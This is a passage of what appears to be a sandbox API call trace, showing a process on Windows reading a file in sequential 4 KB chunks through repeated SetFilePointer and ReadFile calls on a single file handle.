lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd4000 [0081.213] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.214] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd5000 [0081.214] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.214] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd6000 [0081.214] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.214] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd7000 [0081.215] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.215] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd8000 [0081.215] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.216] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xd9000 [0081.216] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.216] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xda000 [0081.216] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.217] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xdb000 [0081.217] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.217] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xdc000 [0081.217] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.218] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xdd000 [0081.218] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.218] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xde000 [0081.218] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.218] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xdf000 [0081.219] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.219] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe0000 [0081.219] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.220] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe1000 [0081.220] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.220] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe2000 [0081.220] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.221] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe3000 [0081.221] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.221] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe4000 [0081.221] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.222] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe5000 [0081.222] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.222] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe6000 [0081.222] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.222] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe7000 [0081.222] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.223] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe8000 [0081.223] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.224] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xe9000 [0081.224] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.224] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xea000 [0081.224] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.225] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xeb000 [0081.225] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.225] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xec000 [0081.225] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.225] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xed000 [0081.226] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.227] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xee000 [0081.227] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.227] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xef000 [0081.228] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.228] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf0000 [0081.228] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.229] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf1000 [0081.229] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.229] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf2000 [0081.230] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.230] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf3000 [0081.230] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.231] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf4000 [0081.231] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.231] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf5000 [0081.231] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.232] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf6000 [0081.232] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.232] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf7000 [0081.232] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.232] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf8000 [0081.233] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.234] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xf9000 [0081.234] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.234] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xfa000 [0081.234] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.235] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xfb000 [0081.235] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.235] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xfc000 [0081.235] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.236] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xfd000 [0081.236] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.236] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xfe000 [0081.236] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.237] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0xff000 [0081.237] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.238] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x100000 [0081.238] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.256] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x101000 [0081.256] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.257] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x102000 [0081.257] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.257] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x103000 [0081.257] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.258] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x104000 [0081.258] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.258] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x105000 [0081.258] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.259] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x106000 [0081.259] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.259] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x107000 [0081.259] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.261] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x108000 [0081.261] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.261] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x109000 [0081.261] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.262] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10a000 [0081.262] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.262] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x10b000 [0081.262] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, 